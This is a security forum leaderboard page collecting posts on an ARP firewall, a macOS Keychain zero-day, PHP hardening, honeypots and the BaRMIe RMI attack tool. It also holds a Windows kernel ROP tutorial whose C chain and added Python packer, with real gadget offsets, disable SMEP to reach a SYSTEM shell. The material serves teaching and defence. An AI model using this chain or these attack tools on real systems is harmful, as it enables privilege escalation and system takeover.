Leaderboard
Popular Content
Showing content with the highest reputation on 09/26/17 in all areas
-
Whoever cannot quit smoking and wants to read, PM me with what you'd like from the list.
2 points
-
A group of AI experts from The University of Nottingham and Kingston University managed to create a new method by which two-dimensional images of faces can be converted into 3D using machine learning. The researchers trained a convolutional neural network to perform the task by feeding it tons of data on people's faces. From there it figured out how to guess what a new face looks like from a previously unseen pic, including parts that it can't see in the photograph. The 3D computer vision project really has to be seen to be believed, and you can try it out in a nifty demo here. The website doesn't really do the full technology justice, but it's bloody cool. Members of the team, which consists of Aaron S. Jackson, Adrian Bulat, Vasileios Argyriou, and Georgios Tzimiropoulos, will be presenting their work next month at the International Conference on Computer Vision in Venice. Aaron Jackson said via email: "The website demonstrating it was a quick mashup over the course of a few evenings. I basically made it because I thought seeing yourself in 3D is fun. A lot of research in computer vision is hard to present in a fun way because it's things like new methods for detecting points on a face." An artificial intelligence that can turn pictures into faces is the tip of the iceberg here. The implications go far beyond amusing technology journalists for hours at a time with a website. In reality computer vision is one of the most useful purposes for deep learning and we can't wait to see what Jackson and his fellow developers do next.
Source: https://safeum.com/blog/2738-this-ai-program-can-make-3d-face-models-from-a-selfie.html
2 points
-
See you in November at DefCamp 2017
Want to experience a conference that offers outstanding content infused with a truly cyber security experience? For two days (November 9th-10th) Bucharest will once again become the capital of information security in Central & Eastern Europe, hosting at DefCamp more than 1,300 experts, enthusiasts and companies interested in learning the "what" and "how" of keeping information & infrastructures safe. Now it's getting really close: this year's conference is only months away, and that means very early bird tickets are now available.
Register Now at DefCamp 2017 (50% Off)
What can you expect from the 2017 edition?
2 days full of cyber (in)security topics: GDPR, cyber warfare, ransomware, malware, social engineering, offensive & defensive security measures
3 stages hosting over 35 international speakers and almost 50 hours of presentations
Hacking Village hosting more than 10 competitions where you can test your skills or see how your technology stands
1,300 attendees with a background in cyber security, information technology, development, management, or students eager to learn
How to get involved?
Speaker: Call for Papers & Speakers is available here.
Volunteer: Be part of the DefCamp #8 team and see behind the scenes the challenges an event like this can have.
Partner: Are you searching for opportunities for your company? Become our partner!
Hacking Village: Do you have a great idea for a hacking or cyber security contest? Consider applying to the Hacking Village Call for Contests.
Attendee: Register at DefCamp 2017 right now and you will benefit from very early bird discounts.
Register Now at DefCamp 2017 (50% Off)
Use the following code to get an extra 10% discount on the Very Early Bird tickets by June 27th. This is the best price you will get for the 2017 edition.
Code: DEFCAMP_2017_VEB_10
Website: https://def.camp/
1 point
-
Hi, does anyone know a fake webcam that you have tried and that works well? I keep searching on Google but only find junk. I'd like it to work on Linux, but Windows is OK too if it's good. Thanks!
1 point
-
SCUTUM Firewall
Current Version: 2.5.2
It is now recommended to upgrade SCUTUM with the --upgrade parameter (since 2.5.2).
Current Version Change log:
Added a self-upgrading function; users can now self-upgrade with $ sudo scutum --upgrade
Added an AVALON Framework self-upgrading function (included when using the "--upgrade" parameter)
TODO: Finish developing a stable version of SCUTUM GUI
Recent Changes:
Interfaces are now controlled by a new interface controller class
SCUTUM GUI is now available for testing
Added an option to choose whether to delete the installer file after installation
Fixed arptables detection errors on some Linux distributions
What is SCUTUM?
Long story short, an ARP firewall. It automatically adds gateways to the whitelist on connect and blocks everything else to avoid potential threats. SCUTUM is an ARP firewall that prevents your computer from being ARP-spoofed by other computers on the LAN. SCUTUM controls "arptables" on your computer so it accepts ARP packets only from the gateway. This way, people with malicious intentions cannot spoof your ARP table. SCUTUM also prevents other people from detecting your device on the LAN if SCUTUM is used with a properly configured TCP/UDP firewall. SCUTUM is also capable of handling TCP/UDP/ICMP traffic with iptables. You can choose to enable this feature during installation. However, a more professional firewall controller like UFW is recommended; it can handle traffic with more precision.
Usage & Installation
You should run an installation before running it for the first time, to set up the configuration files. I am not sure whether a portable version is necessary. If you think this should be changed, raise an issue and I will change it.
Installation
    git clone https://github.com/K4YT3X/SCUTUM.git
    cd SCUTUM/
    sudo python3 scutum.py --install   # scutum.py deletes itself after installation
    cd ../
    rm -rf SCUTUM/
GUI Usage
ENABLE: Enable SCUTUM (start automatically)
DISABLE: Disable SCUTUM (never start automatically)
DISABLE (Temporarily): Disable SCUTUM until the next time you connect to a network
Usage
This should be easy. SCUTUM starts automatically by itself after installation.
    $ sudo scutum               # Start SCUTUM normally
    $ sudo scutum --start       # Start SCUTUM manually once, even if it's disabled
    $ sudo scutum --enable      # Enable SCUTUM (start automatically on connect)
    $ sudo scutum --disable     # Disable SCUTUM (don't start automatically on connect)
    $ sudo scutum --reset       # Reset SCUTUM (allow ALL ARP packets temporarily)
    $ sudo scutum --purgelog    # Purge SCUTUM logs
    $ sudo scutum --install     # Run the SCUTUM installation wizard and install SCUTUM into the system
    $ sudo scutum --uninstall   # Remove SCUTUM from the system completely
    $ sudo scutum --upgrade     # Upgrade SCUTUM and the AVALON Framework
SCUTUM Workflow
postconnect:
Connect to Wi-Fi
Accept all ARP packets
Cache the gateway MAC address by establishing a socket connection with a timeout of 0
Add the gateway MAC to the exception list
DROP all ARP packets
[Finished]
postdisconnect:
Accept all ARP packets
[Finished]
Download: SCUTUM-master.zip or: git clone https://github.com/K4YT3X/SCUTUM.git
Source: https://github.com/K4YT3X/SCUTUM
1 point
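The postconnect workflow above (learn the gateway's MAC, whitelist it, drop every other ARP packet) can be written down in a few functions. The following is an added example for this thread, not SCUTUM's own code: it parses the output of `ip -4 route show default` and `ip -4 neigh show` (the sample strings are constructed), pins the gateway by both IP and MAC, emits the arptables commands, and adds a check SCUTUM's description does not mention, namely noticing afterwards that the neighbour cache has been talked into a different MAC for the gateway address. The arptables flags used are `-F`, `-A INPUT`, `-i`, `--source-ip`, `--source-mac`, `-j` and `-P`.

```python
"""Gateway-pinning ARP whitelist in the shape of SCUTUM's postconnect workflow.

Added example for this thread, not SCUTUM's own code. It parses the output of
`ip -4 route show default` and `ip -4 neigh show` (the sample strings below are
constructed), derives the gateway's MAC, and emits the arptables rules that
accept ARP only from that IP/MAC pair and drop everything else.
"""
import re
import socket
import subprocess
from typing import List, Optional, Tuple

# Constructed sample outputs standing in for the two `ip` commands.
SAMPLE_ROUTE = "default via 192.168.1.1 dev wlan0 proto dhcp metric 600\n"
SAMPLE_NEIGH = (
    "192.168.1.1 dev wlan0 lladdr 3c:52:82:aa:bb:cc REACHABLE\n"
    "192.168.1.42 dev wlan0 lladdr f4:5c:89:11:22:33 STALE\n"
)
# Same cache after a poisoning attempt: the gateway IP now maps to another MAC.
SPOOFED_NEIGH = "192.168.1.1 dev wlan0 lladdr f4:5c:89:11:22:33 REACHABLE\n"


def default_gateway(route_output: str) -> Optional[Tuple[str, str]]:
    """(gateway_ip, interface) from `ip route show default`, or None."""
    m = re.search(r"^default via (\S+) dev (\S+)", route_output, re.M)
    return (m.group(1), m.group(2)) if m else None


def neigh_entry(neigh_output: str, ip: str, iface: str) -> Optional[Tuple[str, str]]:
    """(mac, state) for ip on iface from `ip neigh show`, or None if absent."""
    pat = rf"^{re.escape(ip)} dev {re.escape(iface)} lladdr ([0-9a-f:]{{17}}) (\S+)"
    m = re.search(pat, neigh_output, re.M)
    return (m.group(1), m.group(2)) if m else None


def gateway_mac(neigh_output: str, gw_ip: str, iface: str) -> Optional[str]:
    """Only pin a MAC the kernel currently considers REACHABLE; a STALE entry
    may be left over from a previous network."""
    entry = neigh_entry(neigh_output, gw_ip, iface)
    return entry[0] if entry and entry[1] == "REACHABLE" else None


def prime_neighbor_cache(gw_ip: str, port: int = 80) -> None:
    """SCUTUM's 'socket connection with a timeout of 0': force an ARP exchange
    with the gateway so the neighbour cache holds its MAC. Not run at import."""
    try:
        socket.create_connection((gw_ip, port), timeout=0.0).close()
    except OSError:
        pass  # the TCP connect itself does not matter, only the ARP it triggers


def arptables_rules(gw_ip: str, gw_mac: str, iface: str) -> List[List[str]]:
    """Flush, accept ARP from the pinned gateway IP+MAC pair, drop the rest.
    Matching both fields means an 'I am the gateway' reply from another MAC
    is dropped before the kernel updates its ARP table."""
    return [
        ["arptables", "-F"],
        ["arptables", "-A", "INPUT", "-i", iface,
         "--source-ip", gw_ip, "--source-mac", gw_mac, "-j", "ACCEPT"],
        ["arptables", "-A", "INPUT", "-i", iface, "-j", "DROP"],
    ]


def reset_rules() -> List[List[str]]:
    """postdisconnect / --reset: accept all ARP again."""
    return [["arptables", "-F"], ["arptables", "-P", "INPUT", "ACCEPT"]]


def plan_postconnect(route_output: str, neigh_output: str) -> Optional[List[List[str]]]:
    """The whole postconnect step as a list of commands, or None if the gateway
    MAC could not be learned (in which case nothing should be pinned)."""
    gw = default_gateway(route_output)
    if not gw:
        return None
    mac = gateway_mac(neigh_output, *gw)
    return arptables_rules(gw[0], mac, gw[1]) if mac else None


def gateway_changed(neigh_output: str, gw_ip: str, iface: str, pinned_mac: str) -> bool:
    """Periodic check: does the cache now hold a different MAC for the gateway?"""
    entry = neigh_entry(neigh_output, gw_ip, iface)
    return bool(entry) and entry[0].lower() != pinned_mac.lower()


def apply(commands: List[List[str]]) -> None:
    """Run the generated rules (needs root and arptables installed)."""
    for cmd in commands:
        subprocess.run(cmd, check=True)


if __name__ == "__main__":
    route = subprocess.run(["ip", "-4", "route", "show", "default"],
                           capture_output=True, text=True, check=True).stdout
    gw = default_gateway(route)
    if gw:
        prime_neighbor_cache(gw[0])
        neigh = subprocess.run(["ip", "-4", "neigh", "show"],
                               capture_output=True, text=True, check=True).stdout
        for cmd in plan_postconnect(route, neigh) or []:
            print(" ".join(cmd))
```

Run as root it only prints the rules; pass the list to `apply()` to install them. The weak point of any gateway-pinning scheme is the moment of learning: if the attacker answers the first ARP request faster than the real gateway, the wrong MAC gets pinned, which is why `gateway_mac` refuses anything but a REACHABLE entry and `gateway_changed` is worth running again after a few seconds.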
-
Apple yesterday rolled out a new version of its macOS operating system, dubbed High Sierra 10.13, a few hours before an ex-NSA hacker publicly disclosed the details of a critical vulnerability that affects High Sierra as well as all earlier versions of macOS. Patrick Wardle, an ex-NSA hacker and now head of research at security firm Synack, found a critical zero-day vulnerability in macOS that could allow any installed application to steal usernames and plaintext passwords of online accounts stored in the Mac Keychain. The macOS Keychain is a built-in password management system that helps Apple users securely store passwords for applications, servers, websites, cryptographic keys and credit card numbers, which can be accessed using only a user-defined master password. Typically no application can access the contents of Keychain unless the user enters the master password. The security flaw actually resides in macOS's kernel extension SKEL (Secure Kernel Extension Loading) security feature, which was disclosed earlier this month, allowing an attacker to load any third-party kernel extension without requiring user approval. Wardle yesterday posted a proof-of-concept video of the exploit, demonstrating how the hack can be used to exfiltrate every single plaintext password from Keychain without requiring the user to enter the master password. The video shows how a malicious installed application, signed or unsigned, allowed an attacker to remotely steal all the passwords stored in the keychain, and does not notify the user of the attack either. Wardle claimed that he reported the issue to Apple last month, and made the public disclosure when the company planned to release High Sierra without fixing the vulnerability, which not only affects the newest version but also older versions of macOS.
Via thehackernews.com
1 point
-
Snuffleupagus is a PHP 7+ module designed to drastically raise the cost of attacks against websites, by killing entire bug classes, and also providing a powerful virtual-patching system, allowing administrators to fix specific vulnerabilities and audit suspicious behaviour without having to touch the PHP code. Snuffleupagus has a lot of features that can be divided into two main categories: bug-class killers and virtual patching. The first category provides primitives to kill various bug families (like arbitrary code execution via unserialize, for example) or raise the cost of exploitation; the second one is a highly configurable system to patch functions in PHP itself.
Link: https://snuffleupagus.readthedocs.io/
1 point
-
Yes, it's no big deal. Still, as a PHP module it can't really offer a general and effective solution. It isn't made to be used in an enterprise, or by anyone else who wants security. I see its place on some small sites that can't afford to hire developers or do a pentest and want something quick, easy to install, and that gives some (false) sense of security.
1 point
-
Yes, interesting, big words... "We're kind of killing it by filtering the $, |, ;, ` and & chars in our default configuration, making it a lot harder for an attacker to inject arbitrary commands." -> And what if these characters are used deliberately by the developer? The module can create problems. At the end of the day, you can't really "kill a bug class" as long as the language allows that "bug class". For example, in Java, to run a system process with "ProcessBuilder", you have to pass it a List<String> as parameters, i.e. an array where the first element is the command (e.g. ls, cat etc.) and each following element is an argument. It doesn't matter whether that parameter contains spaces or special characters; it is treated as an argument, which offers a kind of "Prepared Statements" for process execution. "The goto payload for XSS is often to steal cookies. Like Suhosin, we are encrypting the cookies with a secret key, the IP of the user and its user-agent. This means that an attacker with an XSS won't be able to use the stolen cookie, since he (often) can't spoof the IP address of the user." -> Does it only do """encryption""", which is far too big a word if it's only about the IP address and the user-agent, or does it also check the IP address on the server? "This feature can't be deployed on websites that already stored serialized objects (ie. in database)" -> I think this is the most common case, unfortunately. The approach is interesting: you install a module and you're rid of the problems. But for logical reasons, it isn't and never will be enough. The problem starts higher up: if you let a user do crap, and don't force them to write secure code, you will have problems.
1 point
-
Return Oriented Programming Tutorial
Hi, in this tutorial we will go through a very basic way of creating a ROP (Return Oriented Programming) chain in order to bypass SMEP and get kernel-mode execution on the latest Windows installation despite Microsoft's mitigations.
Setup:
This tutorial is meant to be an active tutorial, meaning it's best if you download the binary provided for the tutorial and experiment on your own with the main ideas presented. So this is what you will need in order to run the full tutorial on your own:
HEVD: download from here.
Windows 10 RS3: here.
WinDbg & Symbols: kd. Symbols.
Hyper-V: How to enable Hyper-V.
Set up file sharing between the machine and the host: Setup File Sharing.
My debug binary: download link.
Introduction:
Return Oriented Programming (in the computer security context) is a technique used to bypass certain defence mechanisms, like DEP (Data Execution Prevention) & SMEP. If you would like to read more about SMEP you can check out the link in the main README.md file of this project. The main characteristic of this method is that instead of running pure shellcode directly from a user-supplied buffer, we use small snippets of code called gadgets. Say for example I want to place 0x1FA5 in rsp; usually I will simply write in my shellcode:
    mov rsp, 0x1FA5
Instead, when using ROP we will try to find some address in memory (this can be a DLL, an EXE image or the kernel image) that does exactly the same, and instead of writing it in the payload we will place the memory address of that code to be executed instead. So let's say I know that at a certain offset from the base address of some DLL, say hal.dll, there is a good instruction; then, assuming that I can get code execution, if I pass the address of that code to the exploit target at runtime it will get executed.
When building a ROP chain, the chain will be composed of many small gadgets like this one; you can think about it like shellcoding with snippets from other executable memory. Here is a little snippet to visualize this:
So in that picture, as an example, we will send our exploit target a buffer that contains: hal+0x6bf0 followed by hal+0x668e, and so on. You may ask yourself: why would we want to do that? Why not simply write the shellcode as is? Well, if you can simply write the shellcode as is then it is far easier to do that, but as mentioned before it may not always be possible. So let's say a little about SMEP. SMEP is a security measure that uses hardware features in order to protect the endpoint from exploits such as kernel exploits. The main idea is to mark each page allocated in memory as either kernel address space (K-executable/r/w) or user space. This way, when the kernel executes code, that code address is checked (if the hardware offers that possibility) to see whether it's a user-space address or a kernel-mode address. If the code is found to be marked as user space, the kernel will stop the execution flow with a critical error, a BSOD. So if we simply try to exploit a stack overflow like we did on Windows 7, we will get this outcome:
So the main idea in ROP is to make the execution flow go through a kernel executable address that can pass the check, until we can execute our own payload. Enough talk, let's debug!!! Assuming that you have set up the environment as stated above and you have a working machine, open an administrator command prompt and type as follows:
Before running anything, hit break on the debugger (open the debug window and click break), then open View -> Registers.
Scroll all the way down and the result should be:
Next, type g and hit enter; the machine should run as normal. Run the sample exe that I have provided; you should get a breakpoint and this output should appear in the debugger:
As you can see this breakpoint is different from the one we hit before. First take a look at the address that triggered the breakpoint. At the breakpoint before we hit:
    0xfffff80391595050 cc int 3
and now we got:
    Break instruction exception - code 0x80000003 (first chance)
    0x0000017039f00046 cc int 3
As you can see the first address is a kernel-space address and the second a user address. This is because I have placed 0xcc in my shellcode. Next, open the registers again; the outcome should be as follows:
You may ask yourself, why has the cr4 register changed, and how is it that we do not get the BSOD message as before? Well, because the binary builds a ROP chain as follows:
    // To better align the buffer,
    // it is useful to declare a
    // memory structure, otherwise you will get holes
    // in the buffer and end up with an access violation.
    typedef struct _RopChain {
        PUCHAR HvlEndSystemInterrupt;
        PUCHAR Var;
        PUCHAR KiEnableXSave;
        PUCHAR payload;
        // PUCHAR deviceCallBack;
    } ROPCHAIN, *PROPCHAIN;

    // Pack the buffer as:
    ROPCHAIN Chain;
    // nt!HvlEndSystemInterrupt+0x1e --> pop rcx; ret
    Chain.HvlEndSystemInterrupt = Ntos + 0x17d970;
    // kd> r cr4
    // ...1506f8
    Chain.Var = (PUCHAR)0x506f8;
    // nt!KiEnableXSave+0x7472 --> mov cr4, rcx; ret
    Chain.KiEnableXSave = Ntos + 0x434a33;
    // user-mode shellcode, reached once SMEP is off
    Chain.payload = ShellCodeAddress;
meaning that we have sent the vulnerable driver a stack overflow buffer, but instead of supplying our shellcode we have given the driver the buffer above, which is composed of:
    pop rcx       <-- kernel-mode address
    ret
    0x506f8
    mov cr4, rcx
    ret
    (ShellCodeAddress)
So basically we have "jumped" to our shellcode from other kernel-mode addresses, so we did not get the BSOD, simply because we have given the kernel a kernel-mode address, so we passed the check; next we flipped the bit in the cr4 register value to trick the system into thinking SMEP is not supported by the firmware. We can see that by running the kv command. You can see the kernel-mode addresses on the call stack and the execution flow, as well as the NOPs we have placed in our buffer. Hit g again and you should see the outcome below:
As you can see we have hit an access violation; this is because in this demo I did not fix the return address pointer, so we can do this together. Hit r on the debugger:
As you can see the stack is a mess, and the registers as well; the return tries to read a pointer from rax, which is pointing to address zero, so we got an access violation. So just as we had to "jump" to our shellcode to avoid SMEP, we need to jump back to a reasonable state. But how can we know what is a good address to jump back to?
When we looked at the stack before we could see the execution flow. So 0x00007fffb29013aa, the lowest address, called the IOCTL; then we got to our shellcode from the overflow (the NOPs). A good thing to do would be to return to one of our original calls on the stack to resume execution. If we take a look at 0x00007fffb29013aa we can see it's marked as UREV (user executable), so if we jump to that address we will be in the same situation as before (BSOD), so we need to find another place on the stack to jump to. Let's look at nt!IofCallDriver+0x59, which is on the stack as well; we can even see what code is contained at this location by running the command below:
So we can see that this function simply returns back to the caller and is also KREV (kernel executable), so it will be a good choice. While I was finding gadgets I was doing exactly the same: looking for KREV addresses that contain good code for me, like mov cr4, rcx, with the 'u' command in kd. OK, but how can we jump to that address? Open up the registers again and copy the first instruction address in the output of kd> u nt!IofCallDriver+0x59, as follows:
Place it in rip (in View -> Registers), then hit g again. Back in the box you should have a command prompt running as local system. So this is the end of the tutorial; I hope it will be useful. Now you know a bit more about ROP, and have some basic tools to build your own ROP chain. My example code can be found here: C0de. And I challenge you to fix the return address programmatically! For more information please go to the main readme of this project and follow the links provided (how to find gadgets, ROP, SMEP, etc.)
Source: https://github.com/akayn/demos/tree/master/Tutorials
1 point
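The chain in the tutorial is four qwords plus whatever padding reaches the saved return address, and the reason it survives where the Windows 7 style overflow does not is visible by just walking the stack the way `ret` does. The following is an added example written for this thread, not the tutorial's code. It packs the chain in Python (the usual exploit-dev convention, in place of the C struct above), takes the two gadget offsets and the CR4 value from the post (they are specific to the author's ntoskrnl build), and adds a fifth slot for the resume address the post patches in by hand at nt!IofCallDriver+0x59; NTOS_BASE, PAYLOAD, PAD_LEN and RESUME_OFF are constructed placeholders, not real values. `simulate()` is a tiny model that follows the gadgets and treats any return into a user address while CR4.SMEP is set as the bugcheck.

```python
"""Packing the SMEP-bypass ROP chain from the tutorial above.

Added example for this thread, not the tutorial's code. POP_RCX_RET,
MOV_CR4_RCX_RET and CR4_FROM_KD are the values quoted in the post and are
specific to the author's ntoskrnl build. NTOS_BASE, PAYLOAD, PAD_LEN and
RESUME_OFF are constructed placeholders (the post fixes the return address by
hand in the debugger at nt!IofCallDriver+0x59; its offset is not given).
"""
import struct

CR4_SMEP = 1 << 20              # CR4.SMEP, bit 20
POP_RCX_RET = 0x17d970          # nt!HvlEndSystemInterrupt+0x1e : pop rcx ; ret   (from the post)
MOV_CR4_RCX_RET = 0x434a33      # nt!KiEnableXSave+0x7472       : mov cr4, rcx ; ret (from the post)
CR4_FROM_KD = 0x1506f8          # value the post reads with `r cr4`

NTOS_BASE = 0xfffff80391400000  # constructed kernel base
PAYLOAD = 0x0000017039f00000    # constructed user-mode shellcode address
RESUME_OFF = 0x0a2b3c           # placeholder for nt!IofCallDriver+0x59, not a real offset
PAD_LEN = 16                    # distance to the saved return address; driver-specific, constructed


def cr4_without_smep(cr4: int) -> int:
    """The value the chain loads into rcx: CR4 as read, with only SMEP cleared."""
    return cr4 & ~CR4_SMEP


def build_rop_chain(ntos_base=NTOS_BASE, cr4=CR4_FROM_KD, payload=PAYLOAD,
                    resume=NTOS_BASE + RESUME_OFF, pad_len=PAD_LEN) -> bytes:
    """padding | pop rcx;ret | new CR4 | mov cr4,rcx;ret | shellcode | resume"""
    chain = [
        ntos_base + POP_RCX_RET,
        cr4_without_smep(cr4),
        ntos_base + MOV_CR4_RCX_RET,
        payload,                 # a user address, only survivable once SMEP is off
        resume,                  # what the shellcode's final ret pops
    ]
    return b"A" * pad_len + b"".join(struct.pack("<Q", q) for q in chain)


def build_naive_overflow(payload=PAYLOAD, pad_len=PAD_LEN) -> bytes:
    """The Windows 7 style overflow: return straight into user-mode shellcode."""
    return b"A" * pad_len + struct.pack("<Q", payload)


def walk_chain(buf: bytes, pad_len=PAD_LEN):
    """The qwords after the padding, in the order ret will pop them."""
    body = buf[pad_len:]
    return [struct.unpack_from("<Q", body, i)[0] for i in range(0, len(body) - 7, 8)]


def is_user_address(addr: int) -> bool:
    return addr < 0x0000800000000000   # canonical user half on x64


def simulate(buf: bytes, ntos_base=NTOS_BASE, cr4=CR4_FROM_KD, payload=PAYLOAD, pad_len=PAD_LEN):
    """Model: pop the overwritten return address, then follow the two gadgets.
    Any ret into a user address while CR4.SMEP is set is the SMEP bugcheck."""
    stack = walk_chain(buf, pad_len)
    trace, rcx, sp = [], 0, 0

    def pop():
        nonlocal sp
        sp += 1
        return stack[sp - 1]

    rip = pop()
    while True:
        if is_user_address(rip) and cr4 & CR4_SMEP:
            trace.append(("bugcheck", rip))
            break
        if rip == ntos_base + POP_RCX_RET:
            rcx = pop()
            trace.append(("pop rcx", rcx))
            rip = pop()
        elif rip == ntos_base + MOV_CR4_RCX_RET:
            cr4 = rcx
            trace.append(("mov cr4, rcx", cr4))
            rip = pop()
        elif rip == payload:
            trace.append(("shellcode", rip))
            rip = pop()                            # shellcode ends with ret
        else:
            trace.append(("resume", rip))          # back into kernel code that returns cleanly
            break
    return trace, cr4
```

Two things the model makes explicit. First, the chain only writes CR4 with the value the debugger showed minus bit 20; re-enabling SMEP afterwards (another `pop rcx` / `mov cr4, rcx` pair with the original value) is the tidy way to leave the machine, and a kernel with CR4 pinning will bugcheck on the write regardless. Second, the resume slot is the part the post leaves as an exercise: whatever address goes there has to be a kernel return the shellcode's final `ret` can land on with the stack it finds, which is why the post picks a location already on the call stack.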
-
If you're a target for either financially motivated cyber-criminals or nation-state grade attackers, chances are your security team feels outgunned: the bad guys have the time, the skills, and the resources to effect a data breach, and they only have to succeed once, while your security team has to get it right every time. What if you could turn the tables on them? Deception technology excels at detecting these attacks by shifting the cognitive, economic and time costs of the attack back onto the attacker. The principles of deception have been around for years, and recently they've become the secret weapon of purple teams and threat hunters worldwide. The good news is, you can get started seeing the benefits of deception for free using a plethora of open-source honeypots that you can deploy immediately. We're firm believers that deception is so crucial to detecting lateral movement, uncovering privilege escalation, and building threat intelligence that any deception, even old-school honeypots, is valuable. Whenever we're on the road, we make it a point to give a shout-out to some of these tools, and will happily help you plan how you can use them. For free, no strings attached. Just get in touch!
Caveat Emptor: You get what you pay for. Some of these tools may no longer be supported and will require leg-work to get going, but they're a great way to get familiar with deception. They're also emulations, not real systems, so don't expect high-interaction activity. While we'll offer friendly advice around how you can use them, we don't officially support them. For more on planning effective deception, check out our strategy-focused blog posts: 10 Questions To Ask Your Deception Provider; 7 Deadly Sins – How to Fail at Implementing Deception.
Network services
Cowrie is an SSH honeypot based off an earlier favourite called Kippo. It will emulate an interactive SSH server with customisable responses to commands. Another alternative is HonSSH, which sits between a real SSH server and the attacker, MITMing the connection and logging all SSH communications.
Dionaea is a multi-protocol honeypot that covers everything from FTP to SIP (VoIP attacks). Where it really excels is as an SMB decoy. It can even simulate malware payload execution using libemu to analyse multi-part stagers.
IoT (Internet of Things) decoys
HoneyThing emulates the TR-069 WAN management protocol, as well as a RomPager web server, with vulnerabilities. Other IoT decoys can be created by emulating embedded telnet / FTP servers, for example with BusyBox.
SCADA/ICS decoys
Conpot emulates a number of operational technology control systems, including protocols like Modbus, DNP3 and BACnet. It comes with a web server that can emulate a SCADA HMI as well.
GasPot emulates a Veeder-Root Guardian AST that is commonly used for monitoring in the oil and gas industry.
Database and NoSQL honeypots
MongoDB-HoneyProxy emulates an insecure MongoDB database. Hackers regularly scan the interwebs looking for administrators who had an 'oops moment' and exposed their DB to the world.
ElasticHoney emulates an Elasticsearch instance and looks for attempted remote code execution.
Credential honeypots and honeytokens
DCEPT by Dell SecureWorks places deceptive credentials in Microsoft's Active Directory.
Canarytokens by the great guys at Thinkst let you place different types of decoy data across your systems, waiting for an attacker to trigger them.
Honeyclients and malware analysis
Thug is a 'honeyclient' that mimics the behaviour of a web browser to analyse client-side exploits. It can be used to analyse dodgy links, determining whether they serve up malicious JavaScript, ActiveX or Flash components. It can download payload samples and integrates with VirusTotal to analyse what gets served.
Cuckoo Sandbox is not really a honeypot, but it's a great sandbox for malware analysis. You can safely and programmatically execute possible malware samples, including binaries, Microsoft Office documents and emails, within a Cuckoo VM and receive a full report on what code executed, what file / registry changes were made, and what network callbacks were observed. Pair it with VMCloak to automatically build sandbox VMs that are harder for malware to fingerprint.
All-in-one
HoneyDrive is a GNU/Linux distribution that comes pre-installed with a lot of active defence capabilities. Consider it the anti-Kali.
MHN combines Snort, Kippo, Dionaea and Conpot, and wraps them for easy installation and use.
Setting up most of these in a lab should be a fairly simple weekend project for the seasoned security professional. You can then run red-team style attacks against them to figure out exactly what sort of telemetry you can expect. Finally, you can tweak the source to reduce how easily they can be fingerprinted (don't forget to submit patches to the authors if you do). If you'd like to take the next step with professional deception technology, check out our IllusionBLACK platform by seeing a live demo.
Source: https://www.smokescreen.io/practical-honeypots-a-list-of-open-source-deception-tools-that-detect-threats-for-free/
1 point
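The credential honeypots in the list (DCEPT, Canarytokens) work on one rule: a decoy account has no legitimate user, so any authentication attempt naming it is an alert, whatever the outcome. The detection side is small enough to show end to end. The following is an added example written for this thread, not DCEPT or Canarytokens code; the decoy names and the log lines (shaped like Linux sshd messages and flattened Windows 4624/4625 events) are constructed.

```python
"""Detection side of credential honeytokens.

Added example for this thread, not DCEPT or Canarytokens code. Decoy accounts
seeded into a directory have no legitimate user, so any authentication attempt
naming one is an alert by itself, and the same source touching decoys on more
than one host is a lateral-movement signal. The log lines below are
constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

HONEY_ACCOUNTS = {"svc_backup_old", "helpdesk-admin"}   # constructed decoys

SAMPLE_LOGS = [
    "Sep 26 03:14:07 fs01 sshd[2291]: Failed password for svc_backup_old from 10.0.5.23 port 51122 ssh2",
    "Sep 26 03:14:09 fs01 sshd[2291]: Accepted password for alice from 10.0.1.8 port 50110 ssh2",
    "Sep 26 03:15:41 dc01 EventID=4625 TargetUserName=helpdesk-admin IpAddress=10.0.5.23 Status=0xC000006D",
    "Sep 26 03:16:02 dc01 EventID=4624 TargetUserName=bob IpAddress=10.0.1.9 LogonType=3",
    "Sep 26 03:20:55 fs01 sshd[2340]: Invalid user svc_backup_old from 10.0.5.23 port 51190",
]

SSH_RE = re.compile(
    r"sshd\[\d+\]: (?:Failed password for|Accepted password for|Invalid user) "
    r"(?:invalid user )?(\S+) from (\S+)")
WIN_RE = re.compile(r"EventID=(462[45]) TargetUserName=(\S+) IpAddress=(\S+)")


def parse_auth_event(line: str) -> Optional[Dict[str, str]]:
    """{user, src, host, outcome} for an auth line we understand, else None."""
    fields = line.split()
    host = fields[3] if len(fields) > 3 else "?"
    m = SSH_RE.search(line)
    if m:
        return {"user": m.group(1), "src": m.group(2), "host": host,
                "outcome": "success" if "Accepted" in line else "failure"}
    m = WIN_RE.search(line)
    if m:
        return {"user": m.group(2), "src": m.group(3), "host": host,
                "outcome": "success" if m.group(1) == "4624" else "failure"}
    return None


def honey_alerts(lines: List[str], honey=HONEY_ACCOUNTS) -> List[Dict[str, str]]:
    """Every event naming a decoy account; success or failure is irrelevant,
    the account should never be used at all."""
    decoys = {h.lower() for h in honey}
    return [ev for ev in map(parse_auth_event, lines) if ev and ev["user"].lower() in decoys]


def suspects(alerts: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Source IP -> sorted hosts where it touched a decoy."""
    by_src = defaultdict(set)
    for a in alerts:
        by_src[a["src"]].add(a["host"])
    return {src: sorted(hosts) for src, hosts in by_src.items()}
```

The point of keying on the account name rather than on failures is that a decoy whose password the attacker actually recovered (a DCEPT-style credential left in memory, for instance) produces a 4624 success, and that success is the highest-fidelity alert in the whole log. The one thing to verify before trusting such a rule in production is that nothing legitimate (a scanner, a password manager sync, a backup job) ever references the decoys, otherwise the alert stops meaning anything.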
-
BaRMIe
BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services. RMI services often expose dangerous functionality without adequate security controls; however, RMI services tend to pass under the radar during security assessments due to the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools which disappeared soon after; however, even with those tools a successful zero-knowledge attack relies on a significant brute-force attack (~64 bits / 9 quintillion possibilities) being performed over the network. The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute-forcing 64 bits over the network.
Download version 1.0 built and ready to run here: https://github.com/NickstaDB/BaRMIe/releases/download/v1.0/BaRMIe_v1.0.jar
Disclaimer
BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program.
Usage
Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information.
